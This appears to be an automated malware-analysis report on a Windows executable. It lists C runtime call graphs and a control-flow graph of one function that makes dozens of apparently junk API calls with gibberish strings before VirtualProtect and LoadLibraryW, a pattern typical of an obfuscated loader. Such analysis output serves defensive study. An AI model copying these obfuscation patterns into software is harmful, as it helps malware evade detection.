40a8ef __cftog_l 62 API calls 10358->10359 10359->10365 10360 4178c7 10362 41316b __write 91 API calls 10360->10362 10361 417847 10363 41785e 10361->10363 10368 41787b 10361->10368 10362->10365 10364 41316b __write 91 API calls 10363->10364 10364->10365 10365->10089 10366->10365 10367 4148ce __write_nolock 62 API calls 10366->10367 10369 41782d 10366->10369 10372 417838 10366->10372 10367->10369 10368->10365 10386 4149a9 10368->10386 10369->10372 10383 4178f8 10369->10383 10372->10360 10372->10361 10374 417778 10373->10374 10375 41778c 10373->10375 10376 40a8ef __cftog_l 62 API calls 10374->10376 10375->10092 10377 41777d 10376->10377 10378 40b834 __cftog_l 10 API calls 10377->10378 10379 417788 10378->10379 10379->10092 10381 40b0f8 __putw 2 API calls 10380->10381 10382 41776a 10381->10382 10382->10093 10384 40a667 __malloc_crt 62 API calls 10383->10384 10385 41790d 10384->10385 10385->10372 10387 4149b5 _doexit 10386->10387 10388 4149e2 10387->10388 10389 4149c6 10387->10389 10390 4149ee 10388->10390 10396 414a28 10388->10396 10391 40a902 __commit 62 API calls 10389->10391 10392 40a902 __commit 62 API calls 10390->10392 10393 4149cb 10391->10393 10395 4149f3 10392->10395 10394 40a8ef __cftog_l 62 API calls 10393->10394 10406 4149d3 _doexit 10394->10406 10397 40a8ef __cftog_l 62 API calls 10395->10397 10398 4129a8 ___lock_fhandle 64 API calls 10396->10398 10399 4149fb 10397->10399 10400 414a2e 10398->10400 10403 40b834 __cftog_l 10 API calls 10399->10403 10401 414a58 10400->10401 10402 414a3c 10400->10402 10405 40a8ef __cftog_l 62 API calls 10401->10405 10404 414924 __lseeki64_nolock 64 API calls 10402->10404 10403->10406 10407 414a4d 10404->10407 10408 414a5d 10405->10408 10406->10365 10411 414a89 10407->10411 10409 40a902 __commit 62 API calls 10408->10409 10409->10407 10414 412a47 LeaveCriticalSection 10411->10414 10413 414a91 10413->10406 10414->10413 10459 4084e8 10415->10459 10418 405be8 10418->10097 10420 405bb6 10486 4074b2 10420->10486 10578 405b40 10425->10578 10430 4074b2 std::_Lockit::_Lockit EnterCriticalSection 10431 4069d1 10430->10431 10432 4074da _tidy_global LeaveCriticalSection 10431->10432 10433 40605c 10432->10433 10433->10100 10434 405a70 10433->10434 10435 405a84 10434->10435 10438 405ac0 10434->10438 10437 407d4c std::exception::exception 62 API calls 10435->10437 10436 405b00 10439 407d4c std::exception::exception 62 API calls 10436->10439 10440 405aa1 10437->10440 10438->10436 10441 407d4c std::exception::exception 62 API calls 10438->10441 10442 405b1d 10439->10442 10443 408b31 __CxxThrowException@8 RaiseException 10440->10443 10444 405ae1 10441->10444 10445 408b31 __CxxThrowException@8 RaiseException 10442->10445 10443->10438 10446 408b31 __CxxThrowException@8 RaiseException 10444->10446 10447 405b3c 10445->10447 10446->10436 10801 4074f1 10448->10801 10451 4084e8 std::locale::facet::_Facet_Register 73 API calls 10452 4068c9 10451->10452 10453 4073c9 std::locale::_Init 76 API calls 10452->10453 10458 40609a 10452->10458 10454 4068d8 10453->10454 10455 4074b2 std::_Lockit::_Lockit EnterCriticalSection 10454->10455 10456 4068ec 10455->10456 10457 4074da _tidy_global LeaveCriticalSection 10456->10457 10457->10458 10458->10104 10461 4084f2 _malloc 10459->10461 10460 407f97 _malloc 62 API calls 10460->10461 10461->10460 10462 405ba8 10461->10462 10466 40850e std::exception::exception 10461->10466 10462->10418 10470 4073c9 10462->10470 10463 40854c 10494 407df8 10463->10494 10466->10463 10468 4091a2 __cinit 72 API calls 10466->10468 10468->10463 10469 408567 10471 4073d5 __EH_prolog3 10470->10471 10472 407450 std::locale::_Locimp::~_Locimp 10471->10472 10473 4074b2 std::_Lockit::_Lockit EnterCriticalSection 10471->10473 10472->10420 10474 4073eb 10473->10474 10476 4084e8 std::locale::facet::_Facet_Register 73 API calls 10474->10476 10485 40743a 10474->10485 10475 4074da _tidy_global LeaveCriticalSection 10475->10472 10477 407400 10476->10477 10478 40740d 10477->10478 10525 407326 10477->10525 10528 40718e 10478->10528 10483 40742d 10538 405710 10483->10538 10485->10475 10487 4074c4 10486->10487 10489 405bc9 10486->10489 10576 40790d EnterCriticalSection 10487->10576 10490 4074da 10489->10490 10491 405bde 10490->10491 10492 4074e1 10490->10492 10491->10097 10577 40791d LeaveCriticalSection 10492->10577 10500 407d73 10494->10500 10497 408b31 10498 408b66 RaiseException 10497->10498 10499 408b5a 10497->10499 10498->10469 10499->10498 10501 407d98 10500->10501 10502 407d83 10500->10502 10501->10497 10506 407d2e 10502->10506 10507 407d41 10506->10507 10508 407d39 10506->10508 10507->10501 10510 407cee 10507->10510 10509 407f5d _free 62 API calls 10508->10509 10509->10507 10511 407d21 10510->10511 10512 407cfc __setlocale_set_cat 10510->10512 10511->10501 10513 407f97 _malloc 62 API calls 10512->10513 10514 407d0e 10513->10514 10514->10511 10516 40a938 10514->10516 10517 40a946 10516->10517 10518 40a94d 10516->10518 10517->10518 10523 40a96b 10517->10523 10519 40a8ef __cftog_l 62 API calls 10518->10519 10520 40a952 10519->10520 10521 40b834 __cftog_l 10 API calls 10520->10521 10522 40a95c 10521->10522 10522->10511 10523->10522 10524 40a8ef __cftog_l 62 API calls 10523->10524 10524->10520 10526 407281 _Yarn 62 API calls 10525->10526 10527 40735e 10526->10527 10527->10478 10529 40719c 10528->10529 10530 4071ad 10528->10530 10543 407890 10529->10543 10532 407281 10530->10532 10533 407293 10532->10533 10537 4072be _memmove 10532->10537 10534 407f5d _free 62 API calls 10533->10534 10535 40729d 10533->10535 10534->10535 10536 407f97 _malloc 62 API calls 10535->10536 10535->10537 10536->10537 10537->10483 10539 4074b2 std::_Lockit::_Lockit EnterCriticalSection 10538->10539 10540 40571f 10539->10540 10541 4074da _tidy_global LeaveCriticalSection 10540->10541 10542 405734 10541->10542 10542->10485 10544 4078a4 EncodePointer 10543->10544 10545 40789e _abort 10543->10545 10544->10530 10546 40a756 10545->10546 10552 40bce3 10545->10552 10549 40b6b9 __call_reportfault 8 API calls 10546->10549 10551 40a76e 10546->10551 10548 408382 _raise 62 API calls 10550 40a778 10548->10550 10549->10551 10551->10548 10553 40bcef _doexit 10552->10553 10554 40bd16 10553->10554 10555 40bd4a 10553->10555 10557 40bd59 10553->10557 10558 40bd1b _siglookup 10553->10558 10556 40c187 __getptd_noexit 62 API calls 10554->10556 10555->10557 10555->10558 10556->10558 10559 40a8ef __cftog_l 62 API calls 10557->10559 10562 40bdb6 10558->10562 10563 408382 _raise 62 API calls 10558->10563 10569 40bd24 _doexit 10558->10569 10560 40bd5e 10559->10560 10561 40b834 __cftog_l 10 API calls 10560->10561 10561->10569 10564 40bbb9 __lock 62 API calls 10562->10564 10565 40bdc1 10562->10565 10563->10562 10564->10565 10567 40bdf6 10565->10567 10570 40c050 EncodePointer 10565->10570 10571 40be4a 10567->10571 10569->10546 10570->10567 10572 40be50 10571->10572 10573 40be57 10571->10573 10575 40bae0 LeaveCriticalSection 10572->10575 10573->10569 10575->10573 10576->10489 10577->10491 10579 4074b2 std::_Lockit::_Lockit EnterCriticalSection 10578->10579 10580 405b54 10579->10580 10581 4074da _tidy_global LeaveCriticalSection 10580->10581 10582 405b69 10581->10582 10583 406a30 10582->10583 10584 4074b2 std::_Lockit::_Lockit EnterCriticalSection 10583->10584 10585 406a55 10584->10585 10586 4074b2 std::_Lockit::_Lockit EnterCriticalSection 10585->10586 10590 406a9d 10585->10590 10587 406a7b 10586->10587 10588 4074da _tidy_global LeaveCriticalSection 10587->10588 10588->10590 10589 406ada 10591 4074da _tidy_global LeaveCriticalSection 10589->10591 10590->10589 10604 405800 10590->10604 10593 4069b4 10591->10593 10593->10430 10593->10433 10595 406b0e 10597 4074b2 std::_Lockit::_Lockit EnterCriticalSection 10595->10597 10599 406b23 10597->10599 10601 4074da _tidy_global LeaveCriticalSection 10599->10601 10600 408b31 __CxxThrowException@8 RaiseException 10600->10595 10602 406b38 10601->10602 10617 407111 10602->10617 10605 4058c1 10604->10605 10606 40582c 10604->10606 10605->10595 10614 407db3 10605->10614 10606->10605 10607 4084e8 std::locale::facet::_Facet_Register 73 API calls 10606->10607 10608 40583c 10607->10608 10613 405885 10608->10613 10620 4055b0 10608->10620 10613->10605 10641 405650 10613->10641 10615 407d4c std::exception::exception 62 API calls 10614->10615 10616 406aff 10615->10616 10616->10600 10618 4084e8 std::locale::facet::_Facet_Register 73 API calls 10617->10618 10619 40711d 10618->10619 10619->10589 10621 4074b2 std::_Lockit::_Lockit EnterCriticalSection 10620->10621 10622 4055d8 10621->10622 10623 40562a 10622->10623 10654 407d4c 10622->10654 10657 4072d9 10623->10657 10628 408b31 __CxxThrowException@8 RaiseException 10628->10623 10629 407641 10782 40a641 10629->10782 10634 40a6ac __calloc_crt 62 API calls 10635 407668 10634->10635 10636 407690 10635->10636 10637 407671 10635->10637 10639 40a0ce ___pctype_func 70 API calls 10636->10639 10792 40a0ce 10637->10792 10640 40767b _memmove 10639->10640 10640->10613 10797 407266 10641->10797 10644 40568b 10646 40569e 10644->10646 10647 407f5d _free 62 API calls 10644->10647 10645 407f5d _free 62 API calls 10645->10644 10648 407f5d _free 62 API calls 10646->10648 10650 4056b1 10646->10650 10647->10646 10648->10650 10649 4074da _tidy_global LeaveCriticalSection 10652 4056d9 10649->10652 10651 407f5d _free 62 API calls 10650->10651 10653 4056c4 10650->10653 10651->10653 10652->10605 10653->10649 10655 407cee std::exception::_Copy_str 62 API calls 10654->10655 10656 405613 10655->10656 10656->10628 10666 409c86 10657->10666 10659 4072e7 10660 407281 _Yarn 62 API calls 10659->10660 10661 4072ff 10660->10661 10662 409c86 _setlocale 89 API calls 10661->10662 10663 40730f 10661->10663 10662->10663 10664 407281 _Yarn 62 API calls 10663->10664 10665 405631 10664->10665 10665->10629 10667 409c92 _doexit 10666->10667 10668 409cb3 10667->10668 10669 409c9c 10667->10669 10671 40c200 __getptd 62 API calls 10668->10671 10670 40a8ef __cftog_l 62 API calls 10669->10670 10672 409ca1 10670->10672 10673 409cb8 10671->10673 10674 40b834 __cftog_l 10 API calls 10672->10674 10675 40f1d0 _LocaleUpdate::_LocaleUpdate 70 API calls 10673->10675 10679 409cac _doexit _setlocale 10674->10679 10676 409cc2 10675->10676 10677 40a6ac __calloc_crt 62 API calls 10676->10677 10678 409cd8 10677->10678 10678->10679 10680 40bbb9 __lock 62 API calls 10678->10680 10679->10659 10681 409cee 10680->10681 10702 4091b9 10681->10702 10688 409d1e ___TypeMatch 10692 40bbb9 __lock 62 API calls 10688->10692 10689 409dcf 10690 40ef9f ___removelocaleref 8 API calls 10689->10690 10691 409dd5 10690->10691 10752 40f038 10691->10752 10694 409d44 10692->10694 10727 40f183 10694->10727 10699 409d7a 10749 409dc4 10699->10749 10701 40f183 __updatetlocinfoEx_nolock 70 API calls 10701->10699 10703 4091c2 10702->10703 10705 4091db 10702->10705 10704 40ef10 ___addlocaleref 8 API calls 10703->10704 10703->10705 10704->10705 10706 409db8 10705->10706 10707 40bae0 _doexit LeaveCriticalSection 10706->10707 10708 409d05 10707->10708 10709 409a6a 10708->10709 10710 409a93 10709->10710 10717 409aae 10709->10717 10711 409a9d 10710->10711 10713 409730 __setlocale_set_cat 89 API calls 10710->10713 10716 408f61 __cftog_l 5 API calls 10711->10716 10712 409bd8 10712->10711 10715 4093aa __setlocale_get_all 66 API calls 10712->10715 10713->10711 10714 409bff 10718 40950f __expandlocale 81 API calls 10714->10718 10715->10711 10719 409c84 10716->10719 10717->10712 10717->10714 10723 409ae3 _strpbrk __setlocale_set_cat _strncmp _strcspn 10717->10723 10720 409c14 ___TypeMatch 10718->10720 10719->10688 10719->10689 10720->10711 10720->10712 10721 409730 __setlocale_set_cat 89 API calls 10720->10721 10721->10720 10722 40db7e ___lc_strtolc 62 API calls 10722->10723 10723->10711 10723->10712 10723->10722 10724 409bf1 10723->10724 10725 409730 __setlocale_set_cat 89 API calls 10723->10725 10726 40b7e2 __invoke_watson 10 API calls 10724->10726 10725->10723 10726->10711 10728 409d56 10727->10728 10729 40f190 10727->10729 10735 40ef9f 10728->10735 10729->10728 10730 40ef10 ___addlocaleref 8 API calls 10729->10730 10731 40f1a6 10730->10731 10731->10728 10732 40ef9f ___removelocaleref 8 API calls 10731->10732 10733 40f1b1 10732->10733 10733->10728 10734 40f038 ___freetlocinfo 62 API calls 10733->10734 10734->10728 10736 40efb0 InterlockedDecrement 10735->10736 10737 409d5c 10735->10737 10738 40efc5 InterlockedDecrement 10736->10738 10739 40efc8 10736->10739 10737->10699 10737->10701 10738->10739 10740 40efd2 InterlockedDecrement 10739->10740 10741 40efd5 10739->10741 10740->10741 10742 40efe2 10741->10742 10743 40efdf InterlockedDecrement 10741->10743 10744 40efec InterlockedDecrement 10742->10744 10746 40efef 10742->10746 10743->10742 10744->10746 10745 40f008 InterlockedDecrement 10745->10746 10746->10745 10747 40f018 InterlockedDecrement 10746->10747 10748 40f023 InterlockedDecrement 10746->10748 10747->10746 10748->10737 10750 40bae0 _doexit LeaveCriticalSection 10749->10750 10751 409dcb 10750->10751 10751->10679 10753 40f0bc 10752->10753 10755 40f04f 10752->10755 10754 40f109 10753->10754 10756 407f5d _free 62 API calls 10753->10756 10758 40e465 ___free_lc_time 62 API calls 10754->10758 10763 40f132 10754->10763 10755->10753 10757 40f083 10755->10757 10767 407f5d _free 62 API calls 10755->10767 10759 40f0dd 10756->10759 10761 40f0a4 10757->10761 10769 407f5d _free 62 API calls 10757->10769 10760 40f127 10758->10760 10762 407f5d _free 62 API calls 10759->10762 10768 407f5d _free 62 API calls 10760->10768 10765 407f5d _free 62 API calls 10761->10765 10764 40f0f0 10762->10764 10766 40f177 10763->10766 10770 407f5d 62 API calls _free 10763->10770 10771 407f5d _free 62 API calls 10764->10771 10772 40f0b1 10765->10772 10773 407f5d _free 62 API calls 10766->10773 10774 40f078 10767->10774 10768->10763 10775 40f099 10769->10775 10770->10763 10776 40f0fe 10771->10776 10777 407f5d _free 62 API calls 10772->10777 10778 40f17d 10773->10778 10779 40eab2 ___free_lconv_mon 62 API calls 10774->10779 10780 40e859 ___free_lconv_num 62 API calls 10775->10780 10781 407f5d _free 62 API calls 10776->10781 10777->10753 10778->10679 10779->10757 10780->10761 10781->10754 10783 40c200 __getptd 62 API calls 10782->10783 10784 40a646 10783->10784 10785 40764c 10784->10785 10786 40f1d0 _LocaleUpdate::_LocaleUpdate 70 API calls 10784->10786 10787 40a61b 10785->10787 10786->10785 10788 40c200 __getptd 62 API calls 10787->10788 10789 40a620 10788->10789 10790 407659 10789->10790 10791 40f1d0 _LocaleUpdate::_LocaleUpdate 70 API calls 10789->10791 10790->10634 10791->10790 10793 40c200 __getptd 62 API calls 10792->10793 10794 40a0d3 10793->10794 10795 40a0f0 10794->10795 10796 40f1d0 _LocaleUpdate::_LocaleUpdate 70 API calls 10794->10796 10795->10640 10796->10795 10798 407275 10797->10798 10799 405679 10797->10799 10800 409c86 _setlocale 89 API calls 10798->10800 10799->10644 10799->10645 10800->10799 10802 4084e8 std::locale::facet::_Facet_Register 73 API calls 10801->10802 10803 4074fd 10802->10803 10806 4078ed InitializeCriticalSection 10803->10806 10805 4068ba 10805->10451 10806->10805 10808 408238 _doexit 10807->10808 10809 40bbb9 __lock 57 API calls 10808->10809 10810 40823f 10809->10810 10812 40826a DecodePointer 10810->10812 10816 4082e9 10810->10816 10814 408281 DecodePointer 10812->10814 10812->10816 10820 408294 10814->10820 10815 408366 _doexit 10815->10106 10830 408357 10816->10830 10818 40834e 10821 408114 _doexit 3 API calls 10818->10821 10820->10816 10823 4082ab DecodePointer 10820->10823 10827 4082ba DecodePointer DecodePointer 10820->10827 10828 40c050 EncodePointer 10820->10828 10822 408357 10821->10822 10824 408364 10822->10824 10835 40bae0 LeaveCriticalSection 10822->10835 10829 40c050 EncodePointer 10823->10829 10824->10106 10827->10820 10828->10820 10829->10820 10831 408337 10830->10831 10832 40835d 10830->10832 10831->10815 10834 40bae0 LeaveCriticalSection 10831->10834 10836 40bae0 LeaveCriticalSection 10832->10836 10834->10818 10835->10824 10836->10831

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 429c40-429c60 call 413b10 3 429c62-429c68 0->3 4 429c6a-429c6d CharToOemBuffA 3->4 5 429c6f-429c79 3->5 4->5 6 429c84-429c8a 5->6 7 429c7b-429c7e AddConsoleAliasW 5->7 8 429ca1-429ca8 6->8 9 429c8c-429c92 6->9 7->6 8->3 11 429caa-429cb4 8->11 9->8 10 429c94-429c9f 9->10 10->8 10->11 12 429cba-429ce8 GetAltTabInfoA DrawCaption WinHttpGetProxyForUrl 11->12 13 429d4d-429d61 11->13 15 429d06-429d48 DragAcceptFiles CoGetInstanceFromFile call 407c91 call 40802b call 4176c4 call 405ff0 call 408382 12->15 16 429cea-429d00 SetThreadContext GetFileAttributesExA 12->16 14 429d65-429d6b 13->14 17 429d78-429d7f 14->17 18 429d6d-429d72 14->18 15->13 16->15 20 429db2-429dbd 17->20 21 429d81-429dae GetConsoleAliasesLengthW WriteConsoleOutputCharacterA EnumDateFormatsExW FindNextVolumeMountPointA 17->21 18->17 20->14 23 429dbf-429dda GlobalAlloc 20->23 21->20 25 429de0-429dec 23->25 26 429e99-429e9c 23->26 30 429df0-429df5 25->30 28 429ea2-42a024 SetConsoleCP FindAtomW GetTempPathA CompareStringA GetCurrentDirectoryW lstrlenW GetLocaleInfoW GetCommConfig CancelIo _hread CreateHardLinkA ConvertFiberToThread DeleteVolumeMountPointA EnumSystemCodePagesA GetEnvironmentStringsW InterlockedIncrement InterlockedDecrement GetProcessVersion SetLocaleInfoA _hread * 2 ReadConsoleInputW GetPrivateProfileIntW GetConsoleAliasExesA OpenJobObjectA SetTapeParameters CreateNamedPipeW BuildCommDCBAndTimeoutsW VerSetConditionMask GetCurrencyFormatW lstrcpyA ExitProcess 26->28 29 42a02a-42a03c 26->29 33 42a044-42a047 29->33 34 429df7-429e4f GetWindowsDirectoryW SetThreadIdealProcessor ReadConsoleOutputCharacterW FatalAppExitW BuildCommDCBAndTimeoutsA 30->34 35 429e55-429e62 call 429720 30->35 37 42a071-42a076 33->37 38 42a049-42a06c GetPrivateProfileStringA 33->38 34->35 44 429e90-429e93 35->44 45 429e64-429e8b GetVolumeInformationW GetConsoleAliasA SetProcessShutdownParameters 35->45 42 42a2eb-42a2ef 37->42 43 42a07c-42a2e6 OpenSemaphoreA WriteConsoleOutputW WriteConsoleInputW AddConsoleAliasW HeapCreate DeleteFileA WriteConsoleInputW GetFileAttributesA WaitNamedPipeW GetCalendarInfoW CreateDirectoryExW GetModuleHandleA SetThreadLocale _hread GetCurrentProcess MoveFileWithProgressA HeapFree EnumSystemCodePagesA FoldStringA SetFileShortNameW InterlockedPushEntrySList QueryDosDeviceA BuildCommDCBAndTimeoutsW QueryPerformanceFrequency FindNextFileW SetCommState VerifyVersionInfoW FindNextVolumeMountPointW SetCalendarInfoA GetShortPathNameW GetVolumePathNameW GetVolumeNameForVolumeMountPointA GetConsoleAliasesLengthA TlsFree GetDriveTypeW SetComputerNameA Process32FirstW GetFileAttributesA GetStringTypeW * 2 GetDriveTypeA GetSystemWindowsDirectoryA InterlockedPopEntrySList EnumSystemLocalesW GetCommState IsWow64Process GetSystemDirectoryA GetTempPathW 37->43 38->37 42->33 47 42a2f5-42a30f 42->47 43->42 44->26 44->30 45->44 48 42a310-42a31f 47->48 49 42a343-42a347 48->49 50 42a321-42a33e AddAtomW GetSystemWindowsDirectoryW DisconnectNamedPipe GetConsoleMode 48->50 49->48 51 42a349-42a376 VirtualProtect call 429a30 49->51 50->49 54 42a380-42a38a 51->54 55 42a3b9-42a3cd GlobalFlags LocalFlags 54->55 56 42a38c-42a3b3 InterlockedIncrement GetCharWidthFloatA ClearEventLogA GlobalUnfix OpenWaitableTimerA 54->56 57 42a3da-42a3e1 55->57 58 42a3cf-42a3d4 55->58 56->55 57->54 59 42a3e3-42a3fd 57->59 58->57 60 42a400-42a40a 59->60 61 42a46c-42a470 60->61 62 42a40c-42a466 GetDlgCtrlID DebugActiveProcess WritePrivateProfileSectionW SleepEx GetUserDefaultLangID _llseek GlobalUnlock InitiateSystemShutdownA AbortSystemShutdownW WinHttpReadData WinHttpOpen WinHttpWriteData RevertToSelf 60->62 61->60 63 42a472-42a549 LoadLibraryW 61->63 62->61 64 42a64b-42a654 63->64 65 42a54f-42a645 GetConsoleCursorInfo GetConsoleOutputCP TerminateProcess FindFirstFileW InterlockedDecrement GetModuleHandleW CreateActCtxW _lclose ReadConsoleW GetNamedPipeHandleStateW GlobalFindAtomW lstrlenA GetModuleHandleA VerLanguageNameW CreateEventW ExpandEnvironmentStringsA GetProcessAffinityMask SetTimeZoneInformation ActivateActCtx DeleteVolumeMountPointA 63->65 65->64
                                                                                                                                                              APIs
                                                                                                                                                              • CharToOemBuffA.USER32(00000000,00000000,00000000), ref: 00429C6D
                                                                                                                                                              • AddConsoleAliasW.KERNEL32(00000000,00000000,00000000,1FF896F3,7694FB30,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 00429C7E
                                                                                                                                                              • GetAltTabInfoA.USER32(00000000,00000000,00000000,00000000,00000000,1FF896F3,7694FB30,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729), ref: 00429CBF
                                                                                                                                                              • DrawCaption.USER32(00000000,00000000,00000000,00000000), ref: 00429CC9
                                                                                                                                                              • WinHttpGetProxyForUrl.WINHTTP(00000000,zitecihucepikigibecit,00000000,684C9EF0,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429CDB
                                                                                                                                                              • SetThreadContext.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429CEC
                                                                                                                                                              • GetFileAttributesExA.KERNEL32(fowigesu lonemofalahez yeyinizesorazepa cazohopegopipoc,00000000,?,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 00429D00
                                                                                                                                                              • DragAcceptFiles.SHELL32(00000000,00000000), ref: 00429D08
                                                                                                                                                              • CoGetInstanceFromFile.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,3F7F80AC,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B), ref: 00429D1A
                                                                                                                                                              • __putw.LIBCMT ref: 00429D32
                                                                                                                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000,1FF896F3,7694FB30,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 00429D82
                                                                                                                                                              • WriteConsoleOutputCharacterA.KERNEL32(00000000,rigiwudocigilopecopisotojohomi,00000000,00000000,3F7F80AC,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 00429D97
                                                                                                                                                              • EnumDateFormatsExW.KERNEL32(00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 00429D9C
                                                                                                                                                              • FindNextVolumeMountPointA.KERNEL32(?,00000000,00000000), ref: 00429DA8
                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000000,?,1FF896F3,7694FB30,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429DC6
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429E00
                                                                                                                                                              • SetThreadIdealProcessor.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429E04
                                                                                                                                                              • ReadConsoleOutputCharacterW.KERNEL32(00000000,?,00000000,00000000,3F7F80AC,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 00429E1C
                                                                                                                                                              • FatalAppExitW.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429E24
                                                                                                                                                              • BuildCommDCBAndTimeoutsA.KERNEL32(zepodasa,07780C44,684C9EF0), ref: 00429E4F
                                                                                                                                                              • GetVolumeInformationW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B), ref: 00429E6C
                                                                                                                                                              • GetConsoleAliasA.KERNEL32(00000000,?,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429E7D
                                                                                                                                                              • SetProcessShutdownParameters.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429E85
                                                                                                                                                              • SetConsoleCP.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 00429EA3
                                                                                                                                                              • FindAtomW.KERNEL32(00000000), ref: 00429EAA
                                                                                                                                                              • GetTempPathA.KERNEL32(00000000,?,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429EB9
                                                                                                                                                              • CompareStringA.KERNEL32(00000000,00000000,00000000,00000000,vekemepozub,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258), ref: 00429EC9
                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,?,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429ED8
                                                                                                                                                              • lstrlenW.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 00429EDF
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000000,?,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429EF0
                                                                                                                                                              • GetCommConfig.KERNEL32(00000000,00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 00429EF9
                                                                                                                                                              • CancelIo.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 00429F00
                                                                                                                                                              • _hread.KERNEL32(00000000,?,00000000), ref: 00429F10
                                                                                                                                                              • CreateHardLinkA.KERNEL32(mujuxalalohigosafemeduwixi,susejitiy,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 00429F21
                                                                                                                                                              • ConvertFiberToThread.KERNEL32(?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80), ref: 00429F27
                                                                                                                                                              • DeleteVolumeMountPointA.KERNEL32(yotasal), ref: 00429F32
                                                                                                                                                              • EnumSystemCodePagesA.KERNEL32(00000000,00000000), ref: 00429F3A
                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80), ref: 00429F40
                                                                                                                                                              • InterlockedIncrement.KERNEL32(3F7F80AC), ref: 00429F4B
                                                                                                                                                              • InterlockedDecrement.KERNEL32(5EBC0077), ref: 00429F56
                                                                                                                                                              • GetProcessVersion.KERNEL32(00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 00429F5D
                                                                                                                                                              • SetLocaleInfoA.KERNEL32(00000000,00000000,00000000), ref: 00429F66
                                                                                                                                                              • _hread.KERNEL32(00000000,00000000,00000000), ref: 00429F75
                                                                                                                                                              • _hread.KERNEL32(00000000,00000000,00000000), ref: 00429F7A
                                                                                                                                                              • ReadConsoleInputW.KERNEL32(00000000,6D5D0E80,00000000,0766FE46,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429F88
                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00429F92
